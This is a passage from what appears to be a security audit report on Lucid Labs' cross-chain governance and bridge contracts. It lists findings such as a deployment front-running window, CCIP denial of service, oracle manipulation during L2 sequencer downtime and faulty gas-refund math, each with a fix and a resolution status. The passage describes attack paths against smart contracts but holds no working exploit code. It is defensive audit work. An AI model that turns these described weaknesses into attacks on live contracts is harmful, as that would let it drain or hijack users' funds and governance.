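// Balanced pool: both methods agree.
console.log(spotLpPrice(100, 100, 1, 1, 100)); // 2
console.log(fairLpPrice(100, 100, 1, 1, 100)); // 2

// After a swap skews the reserves (k preserved: 400 * 25 = 100 * 100),
// the spot-based price moves while the fair price is unchanged.
console.log(spotLpPrice(400, 25, 1, 1, 100)); // 4.25
console.log(fairLpPrice(400, 25, 1, 1, 100)); // 2
```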
SOLVED: The Lucid Labs team implemented several changes, including the recommended solution and an oracle implementation for the prices of the LP vault's tokens.
// Medium
The current implementation of the AccessConfigurator, RefundGasUpgradeable, and TimelockUpgradeable contracts introduces a front-running vulnerability due to the separation of deployment and configuration into two distinct transactions.
The process occurs as follows:
function configureTimelock(IAccessControl timelock, address governor, address canceller) external {
_configureTimelock(timelock, governor, canceller);
}
function configureRefundGas(IRefundGas refundGas, address governor) external {
_configureRefundGas(refundGas, governor);
}
function configureTimelockRefundGas(IAccessControl timelock, IRefundGas refundGas, address governor, address canceller) external {
_configureTimelock(timelock, governor, canceller);
_configureRefundGas(refundGas, governor);
}
function _configureTimelock(IAccessControl timelock, address governor, address canceller) internal {
timelock.grantRole(PROPOSER_ROLE, governor);
timelock.grantRole(EXECUTOR_ROLE, address(0));
timelock.grantRole(CANCELLER_ROLE, canceller);
timelock.grantRole(TIMELOCK_ADMIN_ROLE, governor);
timelock.revokeRole(TIMELOCK_ADMIN_ROLE, address(this));
}
function _configureRefundGas(IRefundGas refundGas, address governor) internal {
refundGas.updateGovernor(governor);
refundGas.transferOwnership(governor);
}
Contracts are deployed:
const TimelockUpgradeable = await ethers.getContractFactory("TimelockUpgradeable");
timelock = await upgrades.deployProxy(TimelockUpgradeable, ["5000", [], [], accessConfigurator.address], {
initializer: "initialize",
});
// Similar deployment for RefundGasUpgradeable
Contracts are then configured in a separate transaction:
await accessConfigurator.configureTimelockRefundGas(timelock.address, refundGas.address, governor.address, user1Signer.address);
This two-step process creates a time window between deployment and configuration where the contracts are in an undefined and potentially vulnerable state.
An attacker monitoring the mempool can identify the deployment transaction and front-run the configuration transaction. This allows the attacker to:
Gain unauthorized control over the Timelock contract by setting themselves as the proposer, executor, or admin.
Manipulate the RefundGas contract by setting an arbitrary governor address.
Potentially lock out the intended administrators or governors, requiring contract redeployment.
To mitigate this vulnerability, implement an atomic deployment and configuration process, for example with a factory contract:
contract GovernanceSystemFactory {
function deployAndConfigureSystem(
address governor,
address user1,
// Other necessary parameters
) external returns (address timelock, address refundGas) {
// Deploy contracts
timelock = address(new TimelockUpgradeable());
refundGas = address(new RefundGasUpgradeable());
// Configure contracts
TimelockUpgradeable(timelock).initialize(5000, new address[](0), new address[](0), address(this));
RefundGasUpgradeable(refundGas).initialize(governor, 2000000000, 36000, 200000, 200000000000, address(this));
// Set up roles and permissions
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).PROPOSER_ROLE(), governor);
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).EXECUTOR_ROLE(), address(0));
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).CANCELLER_ROLE(), user1);
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).TIMELOCK_ADMIN_ROLE(), governor);
TimelockUpgradeable(timelock).revokeRole(TimelockUpgradeable(timelock).TIMELOCK_ADMIN_ROLE(), address(this));
RefundGasUpgradeable(refundGas).transferOwnership(governor);
return (timelock, refundGas);
}
}
Use this factory to deploy and configure the system in one atomic transaction.
SOLVED: This contract has been removed from the repository, solving the issue.
// Medium
The CCIPAdapter contract in the LucidLabs protocol uses Chainlink's Cross-Chain Interoperability Protocol (CCIP) to facilitate cross-chain communication. However, the implementation fails to handle exceptions gracefully in the receiving contracts, specifically in VotingControllerUpgradeable and AssetController.
function _ccipReceive(Client.Any2EVMMessage memory any2EvmMessage) internal override {
    // ... decode _originSender, _callData and chainId from any2EvmMessage ...
    _registerMessage(bytes32ToAddress(_originSender), _callData, chainId);
}
This function calls registerMessage() on VotingControllerUpgradeable and AssetController, which can revert for various reasons:
function castCrossChainVote(...) external {
// @audit can revert if state(proposalId) is not Active or if timepoint does not match the proposal snapshot
if ((adapter != msg.sender) || (state(proposalId) != ProposalState.Active) || (proposalSnapshot(proposalId) != timepoint) || (chainTokens[chainId] != sourceToken))
revert Governor_WrongParams();
// ...
_countVote(proposalId, voter, support, votes, voteData, chainId);
// ...
}
function _countVote(
uint256 proposalId,
address account,
uint8 support,
uint256 totalWeight,
bytes memory voteData, // @audit when called from LucidGovernor{Timelock}, voteData is empty and _countVoteNominal is used
uint256 chainId
) internal virtual {
if (totalWeight == 0) revert GovernorCrossCountingFractionalUpgradeable_NoWeight();
if (_proposalVotersWeightCast[_getVoterKey(proposalId, account, chainId)] >= totalWeight) { revert("GovernorCountingFractional: all weight cast");}
// ... //
}
function receiveMessage(...) public override nonReentrant {
// ...
uint256 _currentLimit = mintingCurrentLimitOf(msg.sender);
if (_currentLimit < transfer.amount) revert IXERC20_NotHighEnoughLimits();
// ...
}
These unhandled exceptions can cause CCIP messages to fail, potentially triggering Chainlink's manual execution mode after the 8-hour Smart Execution window. This will block subsequent messages, leading to a Denial of Service in cross-chain communication until the failed message can be executed.
The unhandled exceptions in CCIP message processing result in a vulnerability that disrupts cross-chain operations. This issue leads to:
Failure in updating cross-chain voting data, compromising the integrity of the governance system.
Blockage of asset transfers between chains, affecting the core functionality of the protocol.
Potential permanent DoS of the CCIP pathway until the blocked message can be executed.
It is recommended to implement proper exception handling in the receiving contracts, or to split message handling into separate receive and execute steps so that a failing message can be stored and retried without blocking subsequent messages.
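The receive/execute split can be sketched in Python (hypothetical MessageQueue and handler names, not protocol code): the receive phase only records the message, so it never reverts, and execution can be retried later.

```python
# Sketch of a two-phase pattern: receiving a cross-chain message never
# fails; execution is a separate, retryable step. Names are illustrative.
class MessageQueue:
    def __init__(self, handler):
        self.handler = handler
        self.pending = {}  # message_id -> payload awaiting execution

    def receive(self, message_id, payload):
        # Phase 1: just record the message; no business logic that can fail
        self.pending[message_id] = payload

    def execute(self, message_id):
        # Phase 2: anyone may retry; a failure leaves the message queued
        try:
            self.handler(self.pending[message_id])
        except Exception:
            return False
        del self.pending[message_id]
        return True

# A handler that fails on the first attempt (e.g. a temporary rate limit)
attempts = {"n": 0}
def handler(payload):
    attempts["n"] += 1
    if attempts["n"] == 1:
        raise RuntimeError("IXERC20_NotHighEnoughLimits")

q = MessageQueue(handler)
q.receive("msg-1", {"amount": 100})
assert q.execute("msg-1") is False   # first try fails, message stays queued
assert q.execute("msg-1") is True    # retry succeeds once the limit resets
```

With this structure a revert in the business logic never blocks the CCIP lane; it only delays one message.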
RISK ACCEPTED: As the probability of this risk is low, even though the impact is high, the Lucid Labs team will leave the code as is and will rely on the other adapters should this occur.
// Medium
The BondUniV3Oracle contract relies on Uniswap V3's time-weighted average price (TWAP) mechanism, which is vulnerable to price manipulation on L2 networks during sequencer downtime. The vulnerability lies in the _validateAndGetPrice function:
function _validateAndGetPrice(
address token_,
IUniswapV3Pool pool_,
uint32 observationWindowSeconds_,
uint8 decimals_
) internal view returns (uint256) {
(int24 timeWeightedTick, ) = OracleLibrary.consult(address(pool_), observationWindowSeconds_);
// ... (price calculation logic)
}
The OracleLibrary.consult() function assumes price continuity during periods of sequencer inactivity. When an L2 sequencer resumes operation after downtime, it incorrectly extrapolates the last known price across the inactive period. This leads to inaccurate TWAP calculations, as the oracle fails to account for real-world price movements during the downtime.
On Arbitrum, the vulnerability is exacerbated by the delayed inbox feature, which allows transaction forcing. An attacker can exploit this by submitting transactions that take advantage of the outdated price while the sequencer is offline, ensuring their inclusion when the network resumes.
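The extrapolation effect can be sketched numerically. Uniswap V3's oracle accumulates tick-seconds, so a tick that is never updated during downtime is weighted across the whole gap (illustrative ticks and durations, not real pool data):

```python
def twap_tick(segments, window):
    # segments: (tick, seconds) pairs covering `window` seconds, weighted
    # the way the V3 tickCumulative accumulator would weight them
    assert sum(s for _, s in segments) == window
    return sum(t * s for t, s in segments) / window

window = 3600  # one-hour observation window
# Real-world price moved (tick 1000 -> 2000) halfway through the window,
# but the sequencer was down, so no on-chain trade recorded the move:
onchain = twap_tick([(1000, 3600)], window)                # stale tick all hour
offchain = twap_tick([(1000, 1800), (2000, 1800)], window)
print(onchain, offchain)  # 1000.0 1500.0
```

The on-chain TWAP reports the stale tick for the entire window, while the true time-weighted tick is substantially higher; anyone who can force transactions through the delayed inbox can trade against the stale value.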
To mitigate this vulnerability, it is recommended to implement the following measures:
Prioritize the use of Chainlink oracles on L2 networks, as they are designed to handle sequencer downtime scenarios.
If Uniswap V3 oracles must be used on L2s, implement additional safeguards:
Integrate Chainlink's Sequencer Uptime Feed to verify sequencer status.
Enforce a minimum uptime period (e.g., 1 hour) after sequencer recovery before accepting oracle data.
Ensure the sequencer has been operational for at least the duration of the TWAP observation window for each pool query.
SOLVED: Sequencer uptime is now checked in a new BondUniV3OracleL2 contract.
// Medium
The AssetController contract does not refund excess fees sent by users when calling burnAndBridgeMulti or resendTransferMulti. The contract forwards only the specified fees to each adapter without verifying that msg.value equals the sum of the provided fees, potentially leaving unused ETH permanently locked in the contract.
function _relayTransfer(Transfer memory transfer, uint256 destChainId, address[] memory adapters, uint256[] memory fees) internal {
if (adapters.length != fees.length) revert Controller_Invalid_Params();
for (uint256 i = 0; i < adapters.length; i++) {
// @audit fees are relayed but there is no check that sum(fees) == msg.value
IBaseAdapter(adapters[i]).relayMessage{value: fees[i]}(destChainId, getControllerForChain(destChainId), msg.sender, abi.encode(transfer));
emit TransferRelayed(transfer.transferId, adapters[i]);
}
}
The function forwards only the specified fees[i] to each adapter, but it does not check whether the total fees match the msg.value sent with the transaction. Any excess ETH remains in the contract.
It is recommended to implement a check to ensure the total fees match the sent ETH or implement a check to refund excess ETH.
function _relayTransfer(Transfer memory transfer, uint256 destChainId, address[] memory adapters, uint256[] memory fees) internal {
if (adapters.length != fees.length) revert Controller_Invalid_Params();
uint256 totalFees = 0;
for (uint256 i = 0; i < fees.length; i++) {
totalFees += fees[i];
}
require(msg.value == totalFees, "Incorrect ETH amount sent");
for (uint256 i = 0; i < adapters.length; i++) {
// ... existing code ...
}
}
SOLVED: The Lucid Labs team added a check at the end of the relay transfer function verifying that the sum of the fees matches msg.value.
// Medium
The BondChainlinkOracle.sol contract fails to implement a check for the sequencer status on Layer 2 networks (Arbitrum, Optimism, Linea). Specifically, in the _validateAndGetPrice function:
function _validateAndGetPrice(AggregatorV2V3Interface feed_, uint48 updateThreshold_) internal view returns (uint256) {
(uint80 roundId, int256 priceInt, , uint256 updatedAt, uint80 answeredInRound) = feed_.latestRoundData();
if (priceInt <= 0 || updatedAt < block.timestamp - uint256(updateThreshold_) || answeredInRound != roundId)
revert BondOracle_BadFeed(address(feed_));
return uint256(priceInt);
}
This function lacks a crucial check to ensure the L2 sequencer is active before using the price data. Without this check, the contract will continue to use potentially stale price data when the sequencer is down, leading to inaccurate pricing in the protocol.
It is recommended to implement a sequencer uptime check in the BondChainlinkOracle contract for L2 deployments by adding a function to verify the sequencer status and integrating it into the _validateAndGetPrice function.
SOLVED: Sequencer uptime is now checked in a new BondChainlinkOracleL2 contract.
// Medium
The VotingControllerUpgradeable contract inherits from EIP712Upgradeable but fails to call its initializer function during its own initialization. Specifically, the __EIP712_init() function is not invoked in the initialize function of VotingControllerUpgradeable. This results in uninitialized EIP712 state variables.
The current implementation of the initialize function in VotingControllerUpgradeable:
function initialize(
address[] memory controllers,
uint256[] memory chains,
address _localRegistry,
address _owner
) public initializer {
__OwnableInit_init(_owner);
__Pausable_init();
// Missing: __EIP712_init() call
// ... rest of initialization logic ...
}
Impact: The lack of proper EIP712 initialization leads to the following issues:
The _HASHED_NAME and _HASHED_VERSION state variables in the EIP712Upgradeable contract remain uninitialized. These values are used in the castVoteBySig and castVoteWithReasonAndParamsBySig functions.
The contract fails to comply with the EIP712 standard, potentially breaking integrations or front-end applications that expect a proper EIP712 implementation.
Inconsistency is introduced in the protocol, as other similar contracts correctly initialize their EIP712 functionality.
It is recommended to modify the initialize function of VotingControllerUpgradeable to include the EIP712 initialization:
function initialize(
address[] memory controllers,
uint256[] memory chains,
address _localRegistry,
address _owner
) public initializer {
__OwnableInit_init(_owner);
__Pausable_init();
__EIP712_init("VotingController", "1");// Add this line
// ... rest of initialization logic ...
}
SOLVED: __EIP712_init is now called during initialization.
// Low
The gas refund calculation in LucidGovernor.sol and LucidGovernorTimelock.sol is incorrect due to improper handling of EIP-150's 63/64 rule. The startGas measurement is taken before making an external call to the refund function, resulting in inaccurate gas calculations.
In LucidGovernor.sol:
function castVote(uint256 proposalId, uint8 support) public override returns (uint256) {
uint256 startGas = gasleft(); // @audit - measured before external call
address voter = _msgSender();
uint res = super._castVote(proposalId, voter, support, "");
if (refundGas != address(0)) {
IRefundGasUpgradeable(refundGas).refundGas(payable(voter), startGas);// @audit - external call affected by EIP-150
}
return res;
}
In RefundGasUpgradeable.sol:
function refundGas(address payable voter, uint256 startGas) public {
if (msg.sender != governor) revert RefundGas_NotGovernor();
unchecked {
uint256 gasUsed = startGas - gasleft();// @audit - incorrect calculation due to EIP-150
uint256 gasPrice = MathUpgradeable.min(tx.gasprice, basefee + maxRefundPriorityFee);
uint256 refundAmount = MathUpgradeable.min(gasPrice * gasUsed, balance);
(bool refundSent, ) = voter.call{value: refundAmount}("");
}
}
The issue stems from EIP-150's requirement that external calls receive only 63/64ths of the remaining gas. When refundGas() calculates startGas - gasleft(), the startGas value is higher than the gas that was actually available inside the function, because 1/64th of the remaining gas is withheld at the call boundary. The gas-usage figure is therefore inflated by roughly 1/64th of the gas remaining at the time of the call, and the refund paid out is correspondingly overstated.
Impact
Refunds are systematically overstated by roughly 1/64th of the gas remaining when the refund call is made
Every vote therefore drains the refund balance faster than the gas actually spent warrants
The cumulative impact is significant, given this is a governance system with expected high participation
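The overstatement can be sketched with illustrative gas figures (arbitrary numbers, not measured values; call overhead is ignored):

```python
# Illustrative sketch of the EIP-150 63/64 effect on the refund math.
start_gas = 1_000_000            # gasleft() at the top of castVote
vote_cost = 150_000              # gas consumed by _castVote before the refund call
remaining = start_gas - vote_cost

# EIP-150: the callee receives at most 63/64 of the remaining gas,
# so gasleft() inside refundGas starts from the forwarded amount.
forwarded = remaining * 63 // 64
gas_left_inside = forwarded

computed_used = start_gas - gas_left_inside  # what refundGas computes
actual_used = vote_cost                      # gas actually consumed so far

# The computed figure is inflated by ~remaining/64 (off by one from flooring)
print(computed_used - actual_used, remaining // 64)  # 13282 13281
```

With a large gas limit the inflation grows with the unused gas, which is why scaling startGas by 63/64 (as recommended below) brings the computed usage back toward the true figure.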
It is recommended to account for the 63/64 rule in the calculation:
function refundGas(address payable voter, uint256 startGas) public {
unchecked {
uint256 adjustedStartGas = (startGas * 63) / 64;
uint256 gasUsed = adjustedStartGas - gasleft();
// rest of the function .. //
}
}
SOLVED: The Lucid Labs team implemented the recommended fix.
// Low
The MessageControllerUpgradeable contract contains a function receiveMessage responsible for handling incoming messages from other chains. In its current implementation, the executableAt timestamp, which determines when a message can be executed, is set immediately upon receipt of the first message. This approach inadvertently ties the start of the timelock period to the arrival of the initial message, rather than to the moment when the message threshold required for execution is met.
Affected code snippet (MessageControllerUpgradeable.sol):
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
/// .. OTHER CODE ... ///
// if message id does not exist
if (receivedMessage.receivedSoFar == 0) {
// store message
/// .. OTHER CODE ... ///
receivedMessage.receivedSoFar = 1;
receivedMessage.executableAt = block.timestamp + timelockDelay;
receivedMessage.expiresAt = block.timestamp + MESSAGE_EXPIRY;
/// .. OTHER CODE ... ////
} else {
// if message id exists
receivedMessage.receivedSoFar += 1;
}
// Check if the message can be executed
if ((receivedMessage.receivedSoFar >= receivedMessage.threshold) && (receivedMessage.expiresAt > block.timestamp)) {
emit MessageExecutableAt(message.messageId, receivedMessage.executableAt);
}
}
In the above code:
The executableAt timestamp is assigned immediately when the first message is received:
receivedMessage.executableAt = block.timestamp + timelockDelay;
This assignment occurs regardless of whether the number of received messages has met the defined threshold for execution.
Assigning the executableAt timestamp upon receipt of the first message leads to a scenario where the timelock period begins even if the message threshold required for execution has not yet been achieved. This results in the following issues:
Insufficient Veto Window: If the threshold is met after a portion of the timelock delay has already elapsed, the vetoer is left with a reduced time frame to cancel the message execution. For example, with a timelockDelay of 24 hours, if the threshold is met 16 hours after the first message, the vetoer only has 8 hours to act.
Predictable Timing Vulnerability: Malicious actors could exploit the predictable reduction in veto time by strategically timing the sending of messages to minimize the veto period.
To ensure that the vetoer has the complete timelockDelay period available once the message threshold is met, the assignment of the executableAt timestamp should be deferred until the threshold condition is satisfied. This guarantees that the timelock period is uniformly applied from the point of threshold attainment, preserving the integrity of the veto mechanism.
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
// ... //
emit MessageReceived(message.messageId, msg.sender);
// if message id does not exist
if (receivedMessage.receivedSoFar == 0) {
// store message
receivedMessage.targets = message.targets;
receivedMessage.calldatas = message.calldatas;
receivedMessage.threshold = message.threshold;
receivedMessage.receivedSoFar = 1;
receivedMessage.originChainId = originChain;
receivedMessage.expiresAt = block.timestamp + MESSAGE_EXPIRY;
receivedMessage.executed = false;
receivedMessage.cancelled = false;
} else {
// if message id exists
receivedMessage.receivedSoFar += 1;
}
// Check if the message can be executed
if (receivedMessage.receivedSoFar >= receivedMessage.threshold && receivedMessage.executableAt == 0 && receivedMessage.expiresAt > block.timestamp) {
// Set the executableAt timestamp now that threshold is met
receivedMessage.executableAt = block.timestamp + timelockDelay;
emit MessageExecutableAt(message.messageId, receivedMessage.executableAt);
}
}
SOLVED: The timelock delay is now set when the threshold is met.
// Low
The VotingControllerUpgradeable contract uses an unsafe message hashing mechanism that breaks EIP712 standard compliance. The issue is found in the getMessageHash function:
// Current unsafe implementation
function getMessageHash(
address _destGovernor,
uint256 _chainId,
uint256 proposalId,
uint8 support,
bytes memory voteData
) public pure returns (bytes32) {
return keccak256(abi.encodePacked(BALLOT_TYPEHASH, _destGovernor, _chainId, proposalId, support, voteData));
}
The implementation uses abi.encodePacked instead of the EIP712 structured-data hashing pattern. The use of abi.encodePacked creates non-standard message signatures that bypass type checking and the EIP712 standard.
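As a generic illustration of why abi.encodePacked is unsafe for signing, consider that it concatenates dynamic values without length prefixes, so distinct argument tuples can produce byte-identical preimages. (In this particular function only voteData is dynamic; the larger problem is the missing EIP712 domain separator and type hash.) Plain byte concatenation stands in for encodePacked here:

```python
# abi.encodePacked concatenates dynamic values with no length prefixes,
# so different argument tuples can produce byte-identical preimages --
# and therefore identical hashes and identical valid signatures.
def encode_packed(*parts: bytes) -> bytes:
    return b"".join(parts)  # stand-in for abi.encodePacked on dynamic types

msg_a = encode_packed(b"transfer:", b"alice", b"bob100")
msg_b = encode_packed(b"transfer:", b"aliceb", b"ob100")
assert msg_a == msg_b  # two different "messages", one signable preimage

# abi.encode (used by EIP-712 struct hashing) length-prefixes and pads
# each field, which removes this ambiguity and adds type information.
```

EIP712's _hashTypedDataV4 additionally binds the signature to a specific contract and chain via the domain separator, preventing cross-contract and cross-chain replay.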
It is recommended to implement EIP712-compliant message hashing:
bytes32 public constant VOTE_TYPEHASH = keccak256(
"Vote(address destGovernor,uint256 chainId,uint256 proposalId,uint8 support,bytes voteData)"
);
function getMessageHash(
address _destGovernor,
uint256 _chainId,
uint256 proposalId,
uint8 support,
bytes memory voteData
) public view returns (bytes32) {
bytes32 structHash = keccak256(
abi.encode(
VOTE_TYPEHASH,
_destGovernor,
_chainId,
proposalId,
support,
keccak256(voteData)
)
);
return _hashTypedDataV4(structHash);
}
SOLVED: Proper EIP712 message hashing format is now used.
// Low
The CREATE3Factory contract will not work on ZKSYNC Era while other factory patterns using CREATE2 remain functional. The documentation explicitly states that basic CREATE2 patterns work:
// This works on ZKSYNC
MyContract a = new MyContract();
MyContract a = new MyContract{salt: ...}();
// This also works
bytes memory bytecode = type(MyContract).creationCode;
assembly {
addr := create2(0, add(bytecode, 32), mload(bytecode), salt)
}
However, CREATE3Factory implements a different pattern that will fail on ZKSYNC:
// CREATE3Factory.sol - Will fail on ZKSYNC
function deploy(bytes32 salt, bytes memory creationCode) external payable returns (address deployed) {
salt = keccak256(abi.encodePacked(msg.sender, salt));
return CREATE3.deploy(salt, creationCode, msg.value);// @audit-issue Uses proxy bytecode pattern
}
The CREATE3 implementation relies on proxy deployment patterns and runtime bytecode manipulation:
bytes internal constant PROXY_BYTECODE = hex"67_36_3d_3d_37_36_3d_34_f0_3d_52_60_08_60_18_f3";
function deploy(bytes32 salt, bytes memory creationCode, uint256 value) internal returns (address) {
bytes memory proxyChildBytecode = PROXY_BYTECODE;
assembly {
// Deploy proxy bytecode which ZKSYNC cannot handle
proxy := create2(0, add(proxyChildBytecode, 32), mload(proxyChildBytecode), salt)
}
// Additional proxy logic that breaks on ZKSYNC...
}
CREATE3Factory deployments fail on the ZKSYNC Era chain.
It is recommended to remove CREATE3Factory for ZKSYNC deployments or add chain restrictions.
RISK ACCEPTED: The Lucid Labs team will work on that in a future release.
// Low
The refundGas() function in RefundGasUpgradeable.sol does not properly handle failed ETH transfers when refunding gas to voters. While the function emits an event with the transfer status, it does not validate or revert on failed transfers.
// RefundGasUpgradeable.sol
function refundGas(address payable voter, uint256 startGas) public {
if (msg.sender != governor) revert RefundGas_NotGovernor();
if (!refundGasEnabled) {
return;
}
unchecked {
uint256 balance = address(this).balance;
if (balance == 0) {
return;
}
uint256 basefee = MathUpgradeable.min(block.basefee, maxRefundBaseFee);
uint256 gasPrice = MathUpgradeable.min(tx.gasprice, basefee + maxRefundPriorityFee);
uint256 gasUsed = MathUpgradeable.min(startGas - gasleft() + refundBaseGas, maxRefundGasUsed);
uint256 refundAmount = MathUpgradeable.min(gasPrice * gasUsed, balance);
(bool refundSent, ) = voter.call{value: refundAmount}("");
emit RefundableVote(voter, refundAmount, refundSent);
}
}
ETH refund transfers fail silently if the recipient is a contract that cannot receive ETH, and affected voters lose their gas refunds.
It is recommended to add a require statement to revert on failed transfers:
function refundGas(address payable voter, uint256 startGas) public {
// ... existing code ...
(bool refundSent, ) = voter.call{value: refundAmount}("");
require(refundSent, "RefundGas: ETH transfer failed");
emit RefundableVote(voter, refundAmount, refundSent);
}
SOLVED: Call success is now checked in refundGas.
// Informational
The AxelarExecutable.sol contract contains two token-execution functions that are never used throughout the codebase:
function executeWithToken(
bytes32 commandId,
string calldata sourceChain,
string calldata sourceAddress,
bytes calldata payload,
string calldata tokenSymbol,
uint256 amount
) external virtual;
function _executeWithToken(
bytes32 commandId,
string calldata sourceChain,
string calldata sourceAddress,
bytes calldata payload,
string calldata tokenSymbol,
uint256 amount
) internal virtual {}
Both functions are declared but never implemented or called within the protocol. The empty implementation of _executeWithToken() and the virtual declaration of executeWithToken() serve no functional purpose in the current architecture.
It is recommended to remove both executeWithToken() and _executeWithToken() from the AxelarExecutable contract since they provide no value to the protocol. If token-execution functionality is needed in the future, it can be added through an upgrade or a new implementation.
SOLVED: The Lucid Labs team removed the unused functions.
// Informational
The codebase contains several instances of unlocked pragma compiler directives. These directives do not specify a fixed compiler version, which can lead to inconsistencies and potential security vulnerabilities due to differences in compiler behavior across versions.
Locking the pragma helps to ensure that contracts do not accidentally get deployed using another pragma. For example, an outdated pragma version might introduce bugs that affect the contract system negatively.
Additionally, using a newer compiler version that introduces default optimizations, including unchecked overflow for gas efficiency, presents an opportunity for further optimization.
It is recommended to lock the pragma version to the same version used during development and testing.
SOLVED: The pragma version is now locked.
// Informational
The WormholeAdapter contract imports the IWormholeReceiver interface, but never utilizes it in any capacity:
import {IWormholeReceiver} from "./interfaces/IWormholeReceiver.sol";
contract WormholeAdapter is BaseAdapter {
// Contract implementation never uses or implements IWormholeReceiver
}
The contract does not implement the interface nor use any of its functions or types. The import statement remains unused throughout the entire contract implementation and serves no functional purpose.
It is recommended to remove the IWormholeReceiver import from WormholeAdapter.sol since it provides no value to the contract.
SOLVED: The unused import has been removed.
// Informational
The _getTwoFeedPrice() function in BondChainlinkOracle.sol makes redundant external calls inside its computation branches when the needed values are already stored in memory variables:
function _getTwoFeedPrice(PriceFeedParams memory params_) internal view returns (uint256) {
// Get decimal value scale factor
uint8 exponent;
uint8 denomDecimals = params_.denominatorFeed.decimals();
uint8 numDecimals = params_.numeratorFeed.decimals();
if (params_.div) {
if (params_.decimals + denomDecimals < numDecimals) revert BondOracle_InvalidParams();
exponent = params_.decimals + params_.denominatorFeed.decimals() - params_.numeratorFeed.decimals();
} else {
if (numDecimals + denomDecimals < params_.decimals) revert BondOracle_InvalidParams();
exponent = params_.denominatorFeed.decimals() + params_.numeratorFeed.decimals() - params_.decimals;
}
The function makes redundant calls to decimals() on both feed contracts within the if/else branches, even though these values are already stored in denomDecimals and numDecimals.
It is recommended to store the decimals values in memory variables and reuse them throughout the computation:
function _getTwoFeedPrice(PriceFeedParams memory params_) internal view returns (uint256) {
// Get decimal value scale factor
uint8 exponent;
uint8 denomDecimals = params_.denominatorFeed.decimals();
uint8 numDecimals = params_.numeratorFeed.decimals();
uint8 paramsDecimals = params_.decimals;
if (params_.div) {
if (paramsDecimals + denomDecimals < numDecimals) revert BondOracle_InvalidParams();
exponent = paramsDecimals + denomDecimals - numDecimals;
} else {
if (numDecimals + denomDecimals < paramsDecimals) revert BondOracle_InvalidParams();
exponent = denomDecimals + numDecimals - paramsDecimals;
}
// Get prices from feeds
uint256 numeratorPrice = _validateAndGetPrice(params_.numeratorFeed, params_.numeratorUpdateThreshold);
uint256 denominatorPrice = _validateAndGetPrice(params_.denominatorFeed, params_.denominatorUpdateThreshold);
// Calculate and scale price
return params_.div ? numeratorPrice.mulDiv(10 ** exponent, denominatorPrice) : numeratorPrice.mulDiv(denominatorPrice, 10 ** exponent);
}
SOLVED: The Lucid Labs team implemented the recommended feature.
// Informational
The burnAndBridge() and burnAndBridgeMulti() functions in AssetController.sol lack input validation for the amount parameter. This allows transactions to be executed with zero amounts:
function burnAndBridge(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address bridgeAdapter
) public payable nonReentrant whenNotPaused {
uint256 _currentLimit = burningCurrentLimitOf(bridgeAdapter);
if (_currentLimit < amount) revert IXERC20_NotHighEnoughLimits();
_useBurnerLimits(bridgeAdapter, amount);
IXERC20(token).burn(_msgSender(), amount); // @audit - amount is not checked for > 0
// ...
}
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters,
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
// ...
IXERC20(token).burn(_msgSender(), amount); // @audit - amount is not checked for > 0
// ...
}
The absence of zero-amount validation allows unnecessary transactions that consume gas without transferring value.
It is recommended to add a zero-amount check at the start of both functions:
function burnAndBridge(...) public payable nonReentrant whenNotPaused {
if (amount == 0) revert InvalidAmount();
// rest of the function
}
function burnAndBridgeMulti(...) public payable nonReentrant whenNotPaused {
if (amount == 0) revert InvalidAmount();
// rest of the function
}
SOLVED: Zero-amount check has been added.
// Informational
In AssetController.sol, the burnAndBridgeMulti() function deducts the fee from the original amount after transferring it, which creates an inconsistency between the expected and actual transferred amounts:
// AssetController.sol#burnAndBridgeMulti
if (fee > 0) {
// First transfers the fee
IERC20(token).transferFrom(_msgSender(), address(this), fee);
IERC20(token).approve(address(feeCollector), fee);
feeCollector.collect(token, fee);
amount = amount - fee; // @audit - Reduces the amount after fee collection
}
// Later burns the reduced amount
IXERC20(token).burn(_msgSender(), amount);
This implementation has several issues:
Users expecting to bridge an exact amount will receive less due to the fee deduction
Any dependent protocols or smart contracts expecting exact amounts will have their transactions fail
This differs from standard DeFi practice where fees are handled separately from the main amount
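The two fee conventions can be contrasted with a small Python sketch (hypothetical basis-point fee and illustrative amounts, not protocol parameters):

```python
def bridge_fee_deducted(amount, fee_bps):
    # Current behavior: the fee comes out of `amount`; the recipient
    # receives less than the amount the sender asked to bridge
    fee = amount * fee_bps // 10_000
    return amount - fee, fee          # (bridged, fee)

def bridge_fee_on_top(amount, fee_bps):
    # Recommended behavior: the sender is charged amount + fee and the
    # full `amount` is bridged, so downstream expectations hold
    fee = amount * fee_bps // 10_000
    return amount, fee                # (bridged, fee)

print(bridge_fee_deducted(10_000, 30))  # (9970, 30) -> recipient shortchanged
print(bridge_fee_on_top(10_000, 30))    # (10000, 30) -> exact amount bridged
```

Charging the fee on top keeps the bridged amount exact, which matters for any integration that checks the received amount against the requested one.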
It is recommended to separate the fee handling from the main amount:
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters,
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
uint256 fee = feeCollector.quote(amount);
if (fee > 0) {
// Transfer fee separately
IERC20(token).transferFrom(_msgSender(), address(this), fee);
IERC20(token).approve(address(feeCollector), fee);
feeCollector.collect(token, fee);
}
// Transfer the full amount separately
IXERC20(token).burn(_msgSender(), amount);
// Rest of the function...
}
SOLVED: Fees are now collected separately and no longer deducted from the bridged amount.
// Informational
In AssetController.sol, the _receiveMessage function performs multiple unnecessary storage writes when handling a ReceivedTransfer. Each first-time (zero-to-nonzero) SSTORE costs 20,000 gas, plus a 2,100-gas cold-access surcharge under EIP-2929, and warm rewrites still cost 100 gas or more.
Current implementation:
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer.recipient = transfer.recipient; // SSTORE
receivedTransfer.amount = transfer.amount; // SSTORE
receivedTransfer.unwrap = transfer.unwrap; // SSTORE
receivedTransfer.receivedSoFar = 1; // SSTORE
receivedTransfer.threshold = transfer.threshold; // SSTORE
receivedTransfer.originChainId = originChain; // SSTORE
